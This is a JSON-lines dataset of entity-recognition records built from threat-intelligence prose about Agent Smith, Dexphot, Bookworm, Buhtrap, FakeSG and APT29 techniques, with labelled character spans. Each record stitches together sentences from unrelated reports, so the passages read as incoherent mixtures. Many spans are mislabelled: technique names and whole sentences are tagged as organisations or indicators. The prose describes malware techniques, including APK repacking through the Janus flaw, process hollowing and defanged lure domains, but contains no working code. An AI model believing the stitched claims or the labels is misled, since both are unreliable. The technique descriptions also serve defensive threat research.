{"text": "If it finds apps on its prey list ( hard-coded or sent from C & C server ) , it will extract the base APK of the target innocent app on the device , patch the APK with malicious ads modules , install the APK back and replace the original one as if it is an update . Chitpas is heavily involved with Thailand politics and was a core leader of the People's Committee for Absolute Democracy ( PCAD ) , which is an organization that staged anti-government campaigns in 2013 and 2014 . It hijacked legitimate system processes to disguise malicious activity . Cloud Administration Command APT29 has used Azure Run Command and Azure Admin - on - Behalf - of ( AOBO ) to execute code on virtual machines .", "spans": [{"start": 308, "end": 316, "label": "Organization"}, {"start": 554, "end": 588, "label": "Organization"}, {"start": 598, "end": 615, "label": "System"}, {"start": 620, "end": 659, "label": "System"}]}
{"text": "\u201c Agent Smith \u201d repacks its prey apps at smali/baksmali code level . The final remaining known decoy includes photos of Chitpas Tant Kridakon ( Figure 7 ) , who is known as heiress to the largest brewery in Thailand . If not stopped , Dexphot ultimately ran a cryptocurrency miner on the device , with monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware . Cloud API APT29 has leveraged the Microsoft Graph API to perform various actions across Azure and M365 environments .", "spans": [{"start": 2, "end": 13, "label": "Malware"}, {"start": 95, "end": 100, "label": "System"}, {"start": 120, "end": 141, "label": "System"}, {"start": 235, "end": 242, "label": "Malware"}, {"start": 413, "end": 428, "label": "Organization"}, {"start": 447, "end": 466, "label": "System"}, {"start": 501, "end": 528, "label": "System"}]}
{"text": "During the final update installation process , it relies on the Janus vulnerability to bypass Android \u2019 s APK integrity checks . These images were associated with the Bookworm campaign code \" 20150905 \" . In the months that followed , we closely tracked the threat and witnessed the attackers upgrade the malware , target new processes , and work around defensive measures . They have also utilized AADInternals PowerShell Modules to access the API .003 Compromise Accounts : Cloud Accounts APT29 has used residential proxies , including Azure Virtual Machines , to obfuscate their access to victim environments .", "spans": [{"start": 64, "end": 69, "label": "Vulnerability"}, {"start": 94, "end": 101, "label": "System"}, {"start": 476, "end": 496, "label": "Organization"}, {"start": 506, "end": 525, "label": "System"}, {"start": 538, "end": 560, "label": "System"}]}
{"text": "Upon kill chain completion , \u201c Agent Smith \u201d will then hijack compromised user apps to show ads . Unit 42 analyzed the systems communicating with the Bookworm C2 domains and found that a majority of the IP addresses existed within autonomous systems ( ASN ) located in Thailand . While Microsoft Defender Advanced Threat Protection \u2019s pre-execution detection engines blocked Dexphot in most cases , behavior-based machine learning models provided protection for cases where the threat slipped through . Enterprise T1482 Domain Trust Discovery During the SolarWinds Compromise , APT29 used the Get - AcceptedDomain PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell .", "spans": [{"start": 31, "end": 42, "label": "Malware"}, {"start": 98, "end": 105, "label": "Organization"}, {"start": 150, "end": 158, "label": "System"}, {"start": 286, "end": 331, "label": "System"}, {"start": 375, "end": 382, "label": "Malware"}, {"start": 550, "end": 575, "label": "Organization"}, {"start": 578, "end": 583, "label": "Organization"}]}
{"text": "In certain situations , variants intercept compromised apps \u2019 original legitimate ads display events and report back to the intended ad-exchange with the \u201c Agent Smith \u201d campaign hacker \u2019 s ad IDs . The pie chart in Figure 8 shows that the vast majority ( 73% ) of the hosts are geographically located in Thailand , which matches the known targeting of this threat group . Given the threat \u2019s persistence mechanisms , polymorphism , and use of fileless techniques , behavior-based detection was a critical component of the comprehensive protection against this malware and other threats that exhibit similar malicious behaviors . They also used AdFind to enumerate domains and to discover trust between federated domains .", "spans": [{"start": 156, "end": 167, "label": "Malware"}, {"start": 645, "end": 651, "label": "System"}]}
{"text": "Our intelligence shows \u201c Agent Smith \u201d droppers proliferate through third-party app store \u201c 9Apps \u201d , a UC team backed store , targeted mostly at Indian ( Hindi ) , Arabic , and Indonesian users . We believe that the IP addresses from Canada , Russia and Norway are analysis systems of antivirus companies or security researchers . Microsoft Defender ATP data shows the effectiveness of behavioral blocking and containment capabilities in stopping the Dexphot campaign . Dynamic Resolution During the SolarWinds Compromise , APT29 used dynamic DNS resolution to construct and resolve to randomly - generated subdomains for C2.[12 ]", "spans": [{"start": 25, "end": 36, "label": "Malware"}, {"start": 92, "end": 97, "label": "System"}, {"start": 286, "end": 305, "label": "Organization"}, {"start": 332, "end": 350, "label": "System"}, {"start": 452, "end": 459, "label": "Malware"}, {"start": 501, "end": 522, "label": "Organization"}, {"start": 525, "end": 530, "label": "Organization"}]}
{"text": "\u201c Agent Smith \u201d itself , though , seems to target mainly India users . Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others . Over time , Dexphot-related malicious behavior reports dropped to a low hum , as the threat lost steam . Encrypted Channel APT29 has used multiple layers of encryption within malware to protect C2 communication .", "spans": [{"start": 2, "end": 13, "label": "Malware"}, {"start": 85, "end": 93, "label": "System"}, {"start": 202, "end": 207, "label": "System"}, {"start": 210, "end": 220, "label": "System"}, {"start": 223, "end": 228, "label": "System"}, {"start": 367, "end": 372, "label": "Organization"}]}
{"text": "Unlike previously discovered non Google Play centric campaigns whose victims almost exclusively come from less developed countries and regions , \u201c Agent Smith \u201d successfully penetrated into noticeable number of devices in developed countries such as Saudi Arabia , UK and US . Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others . Our close monitoring of Dexphot helped us ensure that our customers were protected from the evolving threat . Hybrid Identity APT29 has edited the Microsoft.IdentityServer.Servicehost.exe.config file to load a malicious DLL into the AD FS process , thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name .", "spans": [{"start": 33, "end": 44, "label": "System"}, {"start": 147, "end": 158, "label": "Malware"}, {"start": 291, "end": 299, "label": "System"}, {"start": 408, "end": 413, "label": "System"}, {"start": 416, "end": 426, "label": "System"}, {"start": 429, "end": 434, "label": "System"}, {"start": 474, "end": 481, "label": "Malware"}, {"start": 560, "end": 581, "label": "Organization"}]}
{"text": "Technical Analysis \u201c Agent Smith \u201d has a modular structure and consists of the following modules : Loader Core Boot Patch AdSDK Updater As stated above , the first step of this infection chain is the dropper . Unit 42 enumerated the threat infrastructure related to Bookworm and created a chart to visualize connected entities to its current attack campaign . More importantly , one year \u2019s worth of intelligence helped us gain insight not only into the goals and motivations of Dexphot \u2019s authors , but of cybercriminals in general . Spearphishing Attachment APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.002 Phishing : Spearphishing Link APT29 has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.003 Phishing : Spearphishing via Service APT29 has used the legitimate mailing service Constant Contact to send phishing e - mails .003", "spans": [{"start": 21, "end": 32, "label": "Malware"}, {"start": 210, "end": 217, "label": "Organization"}, {"start": 266, "end": 274, "label": "System"}, {"start": 479, "end": 486, "label": "Malware"}, {"start": 535, "end": 565, "label": "Organization"}, {"start": 680, "end": 704, "label": "Organization"}, {"start": 837, "end": 868, "label": "Organization"}]}
{"text": "The dropper is a repacked legitimate application which contains an additional piece of code \u2013 \u201c loader \u201d . Threat actors have targeted the government of Thailand and delivered the newly discovered Bookworm Trojan since July 2015 . The early stages of a Dexphot infection involves numerous files and processes . Proxy : Multi - hop Proxy A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 ( RDP ) , 139 ( Netbios ) , and 445 ( SMB ) enabling full remote access from outside the network and has also used TOR .004", "spans": [{"start": 139, "end": 149, "label": "Organization"}, {"start": 197, "end": 212, "label": "System"}, {"start": 253, "end": 260, "label": "Malware"}, {"start": 319, "end": 347, "label": "Malware"}, {"start": 356, "end": 361, "label": "Organization"}, {"start": 565, "end": 568, "label": "System"}]}
{"text": "The loader has a very simple purpose , extract and run the \u201c core \u201d module of \u201c Agent Smith \u201d . The actors appear to follow a set playbook , as the observed TTPs are fairly static within each attack in this campaign . During the execution stage , Dexphot writes five key files to disk : Proxy : Domain Fronting APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.007 Remote Services : Cloud Services APT29 has leveraged compromised high - privileged on - premises accounts synced to Office 365 to move laterally into a cloud environment , including through the use of Azure AD PowerShell .", "spans": [{"start": 80, "end": 91, "label": "Malware"}, {"start": 295, "end": 316, "label": "Organization"}, {"start": 408, "end": 423, "label": "System"}, {"start": 426, "end": 446, "label": "Organization"}, {"start": 609, "end": 628, "label": "System"}]}
{"text": "The \u201c core \u201d module communicates with the C & C server , receiving the predetermined list of popular apps to scan the device for . So far , Unit 42 has seen infrastructure overlaps with servers hosting C2 servers for samples of the FFRAT , PlugX , Poison Ivy and Scieron Trojans , suggesting that the threat actors use these tools as the payload in their attacks . 1 \u3001An installer with two URLs ; Scheduled Task / Job : Scheduled Task APT29 has used named and hijacked scheduled tasks to establish persistence .", "spans": [{"start": 140, "end": 147, "label": "Organization"}, {"start": 232, "end": 237, "label": "System"}, {"start": 240, "end": 245, "label": "System"}, {"start": 248, "end": 258, "label": "System"}, {"start": 263, "end": 278, "label": "System"}, {"start": 420, "end": 440, "label": "Organization"}]}
{"text": "If any application from that list was found , it utilizes the Janus vulnerability to inject the \u201c boot \u201d module into the repacked application . The threat actors have continually used Flash Player installers and Flash slideshows for decoys . 2 \u3001An MSI package file downloaded from one of the URLs ; During the SolarWinds Compromise , APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement .", "spans": [{"start": 62, "end": 67, "label": "Vulnerability"}, {"start": 184, "end": 207, "label": "System"}, {"start": 212, "end": 228, "label": "System"}, {"start": 248, "end": 251, "label": "System"}, {"start": 310, "end": 331, "label": "Organization"}, {"start": 334, "end": 339, "label": "Organization"}]}
{"text": "After the next run of the infected application , the \u201c boot \u201d module will run the \u201c patch \u201d module , which hooks the methods from known ad SDKs to its own implementation . The vast majority of systems communicating with Bookworm C2 servers are within the Bangkok metropolitan area where a majority of the government of Thailand exists . 3 \u3001A password-protected ZIP archive ; They manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration .", "spans": [{"start": 220, "end": 228, "label": "System"}, {"start": 305, "end": 315, "label": "Organization"}]}
{"text": "Figure 1 : \u2018 Agent Smith \u2019 s modular structure Technical Analysis \u2013 Loader Module The \u201c loader \u201d module , as stated above , extracts and runs the \u201c core \u201d module . Buhtrap has been active since 2014 , however their first attacks against financial institutions were only detected in August 2015 . 4 \u3001A loader DLL , which is extracted from the archive ; APT29 also created a scheduled task to maintain SUNSPOT persistence when the host booted .", "spans": [{"start": 13, "end": 24, "label": "Malware"}, {"start": 164, "end": 171, "label": "Organization"}, {"start": 237, "end": 259, "label": "Organization"}, {"start": 308, "end": 311, "label": "System"}, {"start": 352, "end": 357, "label": "Organization"}]}
{"text": "While the \u201c core \u201d module resides inside the APK file , it is encrypted and disguised as a JPG file \u2013 the first two bytes are actually the magic header of JPG files , while the rest of the data is encoded with an XOR cipher . At the moment , the group is known to target Russian and Ukrainian banks . 5 \u3001An encrypted data file that holds three additional executables that are loaded into system processes via process hollowing . Enterprise T1649 Steal or Forge Authentication Certificates APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates .", "spans": [{"start": 293, "end": 298, "label": "Organization"}, {"start": 446, "end": 494, "label": "Organization"}]}
{"text": "Figure 2 : \u201c Agent Smith \u2019 s jpg file structure After the extraction , the \u201c loader \u201d module adds the code to the application while using the legitimate mechanism by Android to handle large DEX files . Buhtrap is the first hacker group using a network worm to infect the overall bank infrastructure that significantly increases the difficulty of removing all malicious functions from the network . Except for the installer , the other processes that run during execution are legitimate system processes . Enterprise T1082 System Information Discovery During the SolarWinds Compromise , APT29 used fsutil to check available free space before executing actions that might create large files on disk .", "spans": [{"start": 13, "end": 24, "label": "Malware"}, {"start": 166, "end": 173, "label": "System"}, {"start": 202, "end": 209, "label": "Organization"}, {"start": 279, "end": 283, "label": "Organization"}, {"start": 558, "end": 583, "label": "Organization"}, {"start": 586, "end": 591, "label": "Organization"}]}
{"text": "Figure 3 : Loading core malicious code into the benign application Once the \u201c core \u201d module is extracted and loaded , the \u201c loader \u201d uses the reflection technique to initialize and start the \u201c core \u201d module . Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) . This can make detection and remediation more difficult . Enterprise T1199 Trusted Relationship APT29 has compromised IT , cloud services , and managed services providers to gain broad access to multiple customers for subsequent operations .", "spans": [{"start": 242, "end": 259, "label": "Malware"}, {"start": 314, "end": 318, "label": "Organization"}, {"start": 440, "end": 466, "label": "Organization"}, {"start": 483, "end": 485, "label": "System"}, {"start": 488, "end": 502, "label": "System"}, {"start": 509, "end": 535, "label": "System"}]}
{"text": "Figure 4 : Loader calls initialization method Technical Analysis \u2013 Core Module With the main purpose of spreading the infection , \u201c Agent Smith \u201d implements in the \u201c core \u201d module : A series of \u2018 Bundle \u2019 vulnerabilities , which is used to install applications without the victim \u2019 s awareness . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . These legitimate system processes include msiexec.exe ( for installing MSI packages ) , unzIP . During the SolarWinds Compromise , APT29 gained access through compromised accounts at cloud solution partners , and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems .", "spans": [{"start": 132, "end": 143, "label": "Malware"}, {"start": 196, "end": 202, "label": "Vulnerability"}, {"start": 303, "end": 311, "label": "Malware"}, {"start": 360, "end": 373, "label": "Vulnerability"}, {"start": 376, "end": 389, "label": "Vulnerability"}, {"start": 393, "end": 406, "label": "Vulnerability"}, {"start": 516, "end": 527, "label": "Indicator"}, {"start": 545, "end": 548, "label": "System"}, {"start": 562, "end": 567, "label": "System"}, {"start": 577, "end": 602, "label": "Organization"}, {"start": 605, "end": 610, "label": "Organization"}]}
{"text": "The Janus vulnerability , which allows the actor to replace any application with an infected version . We noticed that criminals were spreading Buhtrap using this method from May 2015 to August 2015 . exe ( for extracting files from the password-protected ZIP archive ) , rundll32.exe ( for loading the loader DLL ) , schtasks.exe ( for scheduled tasks ) , powershell.exe ( for forced updates ) . User Execution : Malicious Link APT29 has used various forms of spearphishing attempting to get a user to click on a malicous link .002 User Execution : Malicious File APT29 has used various forms of spearphishing attempting to get a user to open attachments , including , but not limited to , malicious Microsoft Word documents , .pdf , and .lnk files .", "spans": [{"start": 4, "end": 9, "label": "Vulnerability"}, {"start": 144, "end": 151, "label": "Organization"}, {"start": 201, "end": 204, "label": "Indicator"}, {"start": 272, "end": 284, "label": "Indicator"}, {"start": 310, "end": 313, "label": "System"}, {"start": 318, "end": 330, "label": "Indicator"}, {"start": 357, "end": 371, "label": "Indicator"}, {"start": 414, "end": 434, "label": "Organization"}, {"start": 550, "end": 570, "label": "Organization"}]}
{"text": "The \u201c core \u201d module contacts the C & C server , trying to get a fresh list of applications to search for , or if that fails , use a default app list : whatsapp lenovo.anyshare.gps mxtech.videoplayer.ad jio.jioplay.tv jio.media.jiobeats jiochat.jiochatapp jio.join good.gamecollection opera.mini.native startv.hotstar meitu.beautyplusme domobile.applock touchtype.swiftkey flipkart.android cn.xender It is worth noting that attackers used the same compromised websites to spread Buhtrap as those that had been used for the Corkow Trojan . In later stages , Dexphot targets a few other system processes for process hollowing : svchost.exe , tracert.exe , and setup.exe . Enterprise T1078 Valid Accounts APT29 has used a compromised account to access an organization 's VPN infrastructure .", "spans": [{"start": 151, "end": 159, "label": "System"}, {"start": 160, "end": 179, "label": "Indicator"}, {"start": 180, "end": 201, "label": "Indicator"}, {"start": 202, "end": 216, "label": "Indicator"}, {"start": 217, "end": 235, "label": "Indicator"}, {"start": 236, "end": 254, "label": "Indicator"}, {"start": 255, "end": 263, "label": "Indicator"}, {"start": 264, "end": 283, "label": "Indicator"}, {"start": 284, "end": 301, "label": "Indicator"}, {"start": 302, "end": 316, "label": "Indicator"}, {"start": 317, "end": 335, "label": "Indicator"}, {"start": 336, "end": 352, "label": "Indicator"}, {"start": 353, "end": 371, "label": "Indicator"}, {"start": 372, "end": 388, "label": "Indicator"}, {"start": 389, "end": 398, "label": "Indicator"}, {"start": 447, "end": 467, "label": "System"}, {"start": 478, "end": 485, "label": "System"}, {"start": 522, "end": 535, "label": "System"}, {"start": 556, "end": 563, "label": "Malware"}, {"start": 625, "end": 636, "label": "Indicator"}, {"start": 639, "end": 650, "label": "Indicator"}, {"start": 657, "end": 666, "label": "Indicator"}, {"start": 692, "end": 706, "label": "Organization"}, {"start": 751, "end": 785, "label": "System"}]}
{"text": "eterno truecaller For each application on the list , the \u201c core \u201d module checks for a matching version and MD5 hash of the installed application , and also checks for the application running in the user-space . Moreover , they used the same exploit kit Niteris as that in the Corkow case . Based on Microsoft Defender ATP signals , SoftwareBundler : Win32/ICLoader and its variants are primarily used to drop and run the Dexphot B-MAL S-MAL installer . During the SolarWinds Compromise , APT29 used different compromised credentials for remote access and to move laterally .", "spans": [{"start": 249, "end": 260, "label": "Vulnerability"}, {"start": 276, "end": 282, "label": "System"}, {"start": 299, "end": 317, "label": "System"}, {"start": 332, "end": 364, "label": "Malware"}, {"start": 460, "end": 485, "label": "Organization"}, {"start": 488, "end": 493, "label": "Organization"}]}
{"text": "If all conditions are met , \u201c Agent Smith \u201d tries to infect the application . Purportedly during one of the first attacks hackers intercepted the mailing list of the Anti-drop \" club and created a specific phishing email for its members . The installer uses two URLs to download malicious payloads . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": [{"start": 30, "end": 41, "label": "Malware"}, {"start": 343, "end": 351, "label": "Organization"}, {"start": 367, "end": 378, "label": "Organization"}, {"start": 395, "end": 405, "label": "Organization"}]}
{"text": "The \u201c core \u201d module will use one of two methods to infect the application \u2013 Decompile and Binary . However , it is still widely used , notably in Russia . These are the same two URLs that Dexphot use later to establish persistence , update the malware , and re-infect the device . Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": [{"start": 188, "end": 195, "label": "Malware"}, {"start": 291, "end": 298, "label": "Organization"}, {"start": 347, "end": 361, "label": "System"}, {"start": 373, "end": 386, "label": "Organization"}]}
{"text": "The decompile method is based on the fact that Android applications are Java-based , meaning it is possible to recompile it . As noted in our previous blog on Buhtrap , this gang has been actively targeting Russian businesses , mostly through spear-phishing . The installer downloads an MSI package from one of the two URLs , and then launches msiexec.exe to perform a silent install . As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": [{"start": 47, "end": 54, "label": "System"}, {"start": 215, "end": 225, "label": "Organization"}, {"start": 287, "end": 290, "label": "System"}, {"start": 344, "end": 355, "label": "Indicator"}, {"start": 419, "end": 429, "label": "Organization"}, {"start": 577, "end": 590, "label": "System"}, {"start": 594, "end": 602, "label": "System"}]}
{"text": "Therefore , \u201c Agent Smith \u201d decompiles both the original application and the malicious payload and fuses them together . It is thus interesting to see Buhtrap add strategic web compromises to their arsenal . This is the first of several instances of Dexphot employing living-off-the-land techniques , the use of legitimate system processes for nefarious purposes . Now , there is a potential new competitor in the \" fake updates \" landscape that looks strangely familiar .", "spans": [{"start": 14, "end": 25, "label": "Malware"}, {"start": 250, "end": 257, "label": "Malware"}, {"start": 416, "end": 428, "label": "Organization"}]}
{"text": "Figure 5 : core module mixes malicious payload with the original application While decompiling the original app , \u201c Agent Smith \u201d has the opportunity to modify the methods inside , replace some of the methods in the original application that handles advertisement with its own code and focus on methods communicating with \u2018 AdMob \u2019 , \u2018 Facebook \u2019 , \u2018 MoPub \u2019 and \u2018 Unity Ads \u2019 . The first malware we saw was the lurk downloader , which was distributed on October 26th . Dexphot \u2019s package often contains an obfuscated batch script . The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": [{"start": 116, "end": 127, "label": "Malware"}, {"start": 324, "end": 329, "label": "System"}, {"start": 336, "end": 344, "label": "System"}, {"start": 351, "end": 356, "label": "System"}, {"start": 365, "end": 374, "label": "System"}, {"start": 412, "end": 427, "label": "System"}, {"start": 470, "end": 477, "label": "Malware"}, {"start": 541, "end": 549, "label": "Organization"}, {"start": 566, "end": 572, "label": "Organization"}]}
{"text": "Figure 6 : Targeted ad network Figure 7 : Injection example After all of the required changes , \u201c Agent Smith \u201d compiles the application and builds a DEX file containing both the original code of the original application and the malicious payload . The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload . If the package contains this file , the script is the first thing that msiexec.exe runs when it begins the installation process . The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": [{"start": 98, "end": 109, "label": "Malware"}, {"start": 346, "end": 362, "label": "Malware"}, {"start": 366, "end": 378, "label": "Malware"}, {"start": 490, "end": 501, "label": "Indicator"}, {"start": 553, "end": 566, "label": "Organization"}, {"start": 584, "end": 598, "label": "System"}]}
{"text": "In some cases , the decompilation process will fail , and \u201c Agent Smith \u201d will try another method for infecting the original application \u2013 A binary patch , which simply provides a binary file of the \u201c boot \u201d module of \u201c Agent Smith \u201d . Buhtrap is getting better at disguising the code they inject into compromised websites . The said obfuscated script is designed to check for antivirus products . While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": [{"start": 60, "end": 71, "label": "Malware"}, {"start": 220, "end": 231, "label": "Malware"}, {"start": 236, "end": 243, "label": "Organization"}, {"start": 302, "end": 322, "label": "System"}, {"start": 404, "end": 410, "label": "Organization"}, {"start": 411, "end": 575, "label": "Indicator"}, {"start": 581, "end": 591, "label": "Organization"}]}
{"text": "Once the payload is prepared , \u201c Agent Smith \u201d uses it to build another APK file , exploiting the Janus vulnerability : Figure 8 : The new infected APK file structure Solely injecting the code of the loader is not enough . With the recent arrests of actors using the Lurk banking trojan , Buhtrap appears to be a likely alternative for actors wishing to target Russian banks and software . Dexphot halts the infection process immediately if an antivirus product is found running . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": [{"start": 33, "end": 44, "label": "Malware"}, {"start": 98, "end": 103, "label": "Vulnerability"}, {"start": 267, "end": 286, "label": "System"}, {"start": 369, "end": 374, "label": "Organization"}, {"start": 390, "end": 397, "label": "Malware"}, {"start": 508, "end": 516, "label": "Organization"}, {"start": 529, "end": 537, "label": "Organization"}, {"start": 546, "end": 558, "label": "Organization"}]}
{"text": "As \u201c Agent Smith \u201d uses a modular approach , and as stated earlier , the original loader extracts everything from the assets , the usage of the Janus vulnerability can only change the code of the original application , not the resources . They have different functions and ways of spreading , but the same purpose \u2014 to steal money from the accounts of businesses . When we first began our research , the batch script only checked for antivirus products from Avast and AVG . The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": [{"start": 5, "end": 16, "label": "Malware"}, {"start": 144, "end": 149, "label": "Vulnerability"}, {"start": 352, "end": 362, "label": "Organization"}, {"start": 458, "end": 463, "label": "System"}, {"start": 468, "end": 471, "label": "System"}, {"start": 474, "end": 548, "label": "Indicator"}, {"start": 552, "end": 562, "label": "Organization"}]}
{"text": "This means that the only thing possible in this case is to replace its DEX file . Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants . Later , Windows Defender Antivirus was added to the checklist . In fact , this chain also leads to NetSupport RAT .", "spans": [{"start": 150, "end": 154, "label": "System"}, {"start": 192, "end": 203, "label": "Organization"}, {"start": 214, "end": 240, "label": "System"}, {"start": 305, "end": 319, "label": "System"}]}
{"text": "To overcome this issue , \u201c Agent Smith \u201d found another solution . The first encounter with Buhtrap was registered back in 2014 . If the process is not halted , Dexphot decompresses the password-protected ZIP archive from the MSI package . However , the template source code is quite different and the payload delivery uses different infrastructure .", "spans": [{"start": 27, "end": 38, "label": "Malware"}, {"start": 160, "end": 167, "label": "Malware"}, {"start": 225, "end": 228, "label": "System"}, {"start": 249, "end": 347, "label": "Indicator"}]}
{"text": "Seeing as the system loader of the DEX files ( ART ) fully ignores everything that goes after the data section , the patcher writes all of its resources right there . For now , we can call RTM one of the most active financial Trojans . The password to this archive is within the MSI package . As a result , we decided to call this variant FakeSG .", "spans": [{"start": 189, "end": 192, "label": "System"}, {"start": 216, "end": 225, "label": "Organization"}, {"start": 279, "end": 282, "label": "System"}, {"start": 339, "end": 345, "label": "Organization"}]}
{"text": "This action changes the original file size of the DEX file , which makes the malicious resources a part of the DEX file , a section that is ignored by the signature validation process . At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments \u2014 to the tune of at least $150,000 per hit . Along with the password , the malware \u2019s authors also include a clean version of unzIP . 2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": [{"start": 277, "end": 301, "label": "Organization"}, {"start": 428, "end": 433, "label": "System"}, {"start": 472, "end": 485, "label": "Organization"}]}
{"text": "Figure 9 : Malware secretly adds malicious resources to the DEX file Now , after the alteration of the original application , Android \u2019 s package manager will think that this is an update for the application signed by the same certificate , but in reality , it will execute the malicious DEX file . Buhtrap resurfaced in the beginning of 2017 in the TwoBee campaign , where it served primarily as means of malware delivery . exe so that they do n\u2019t have to rely on the target system having a ZIP utility . On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": [{"start": 126, "end": 133, "label": "System"}, {"start": 425, "end": 428, "label": "Indicator"}, {"start": 492, "end": 503, "label": "System"}, {"start": 519, "end": 527, "label": "Organization"}]}
{"text": "Even now , this is still not enough . After the source codes of their tools became public in 2016 , the name Buhtrap was used for the financial Trojan . The unzIP . Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": [{"start": 134, "end": 150, "label": "System"}, {"start": 157, "end": 162, "label": "System"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 189, "end": 272, "label": "Indicator"}, {"start": 279, "end": 292, "label": "System"}, {"start": 304, "end": 318, "label": "Malware"}]}
{"text": "\u201c Agent Smith \u201d needs to be updated/installed without the user \u2019 s consent . Just like last time , Buhtrap is spreading through exploits embedded in news outlets . exe file in the package is usually named various things , such as z.exe or ex.exe , to avoid scrutiny . RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": [{"start": 2, "end": 13, "label": "Malware"}, {"start": 149, "end": 161, "label": "Organization"}, {"start": 164, "end": 167, "label": "Indicator"}, {"start": 230, "end": 235, "label": "Indicator"}, {"start": 239, "end": 245, "label": "Indicator"}, {"start": 268, "end": 280, "label": "Organization"}, {"start": 326, "end": 339, "label": "Organization"}]}
{"text": "To achieve this , \u201c Agent Smith \u201d utilizes a series of 1-day vulnerabilities , which allows any application to run an activity inside a system application , even if this activity is not exported . Estimating the damages is challenging , but as we learned , the criminals are siphoning off assets in transactions that do not exceed $15,000 each . The ZIP archive usually contains three files : the loader DLL , an encrypted data file ( usually named bin.dat ) , and , often , one clean unrelated DLL , which is likely included to mislead detection . FakeSG has different browser templates depending on which browser the victim is running .", "spans": [{"start": 20, "end": 31, "label": "Malware"}, {"start": 55, "end": 76, "label": "Vulnerability"}, {"start": 393, "end": 407, "label": "System"}, {"start": 449, "end": 456, "label": "Indicator"}, {"start": 479, "end": 498, "label": "System"}, {"start": 549, "end": 555, "label": "Organization"}, {"start": 556, "end": 636, "label": "Indicator"}]}
{"text": "The malicious application sends a request to choose a network account , a specific account that can only be processed by authentication services exported by the malicious application . As explained later , we believe this campaign is financially-motivated and that it targets accounting departments in Russian businesses . Dexphot usually extracts the decompressed files to the target system \u2019s Favorites folder . The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": [{"start": 276, "end": 298, "label": "Organization"}, {"start": 310, "end": 320, "label": "Organization"}, {"start": 323, "end": 330, "label": "Malware"}, {"start": 395, "end": 411, "label": "System"}, {"start": 493, "end": 503, "label": "Organization"}]}
{"text": "The system service \u2018 AccountManagerService \u2019 looks for the application that can process this request . \" Buhgalter \" means \" accountant \" in Russian . The files are given new , random names , which are generated by concatenating words and numbers based on the time of execution ( for example , C:\\Users\\<user>\\Favorites\\\\Res.Center.ponse\\<numbers> ) . Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": [{"start": 375, "end": 413, "label": "Organization"}]}
{"text": "While doing so , it will reach a service exported by \u201c Agent Smith \u201d , and sends out an authentication request that would lead to a call to the \u2018 addAccount \u2019 method . Seeing a campaign like this , inevitably the Anunak/Carbanak documented by Fox-IT and Kaspersky comes to mind . Msiexec.exe next calls rundll32.exe , specifying loader DLL E-TOOL ( urlmon.7z in the example above ) in order to decrypt the data file . The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": [{"start": 55, "end": 66, "label": "Malware"}, {"start": 213, "end": 228, "label": "System"}, {"start": 243, "end": 249, "label": "Organization"}, {"start": 254, "end": 263, "label": "Organization"}, {"start": 280, "end": 291, "label": "Indicator"}, {"start": 303, "end": 315, "label": "Indicator"}, {"start": 329, "end": 335, "label": "System"}, {"start": 336, "end": 346, "label": "System"}, {"start": 349, "end": 358, "label": "Indicator"}, {"start": 394, "end": 415, "label": "Malware"}, {"start": 486, "end": 492, "label": "System"}, {"start": 495, "end": 519, "label": "Indicator"}, {"start": 525, "end": 530, "label": "System"}, {"start": 533, "end": 559, "label": "Indicator"}]}
